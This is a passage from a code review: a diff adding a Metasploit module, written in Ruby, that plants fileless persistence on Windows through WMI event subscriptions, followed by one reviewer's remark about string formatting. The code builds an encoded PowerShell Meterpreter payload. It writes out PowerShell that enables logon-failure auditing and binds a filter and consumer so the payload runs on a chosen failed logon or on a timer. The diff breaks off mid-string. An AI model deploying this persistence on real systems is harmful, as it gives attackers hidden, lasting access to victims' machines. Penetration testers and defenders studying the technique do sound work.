modules/exploits/windows/local/wmi_persistence.rb

```diff
@@ -0,0 +1,152 @@
+          recommended not to use stageles payloads due to powershell script length limitations.
+        },
+      'Author'           => ['Nick Tyrer <@NickTyrer>'],
+      'License'          => MSF_LICENSE,
+      'Privileged'       => true,
+      'Platform'         => 'win',
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [['Windows', {}]],
+      'DisclosureDate' => 'Jun 6 2017',
+      'DefaultTarget'    => 0,
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        },
+      'References' => [
+        ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],
+        ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/']
+      ]
+    ))
+
+    register_options([
+      OptEnum.new('PERSISTENCE_METHOD',
+        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL']]),
+      OptInt.new('EVENT_ID_TRIGGER',
+        [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
+      OptString.new('USERNAME_TRIGGER',
+        [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]),
+     OptInt.new('CALLBACK_INTERVAL',
+        [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]),
+      OptString.new('CLASSNAME',
+        [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+    ])
+  end
+
+
+  def build_payload
+   cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+  end
+
+
+  def subscription_user
+   command = build_payload
+   event_id = datastore['EVENT_ID_TRIGGER']
+   username = datastore['USERNAME_TRIGGER']
+   class_name = datastore['CLASSNAME']
+
+"auditpol.exe /set /subcategory:Logon /failure:Enable
+$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent Within 5 WHERE TargetInstance ISA 'Win32_NTLogEvent' And Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
+$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+  end
+
+  def subscription_interval
+   command = build_payload
+   class_name = datastore['CLASSNAME']
+   callback_interval = datastore['CALLBACK_INTERVAL']
+
+"$timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
```

Comment:
Please clean up the formatting on this string. if internal formatting is important, than I recommend using a heredoc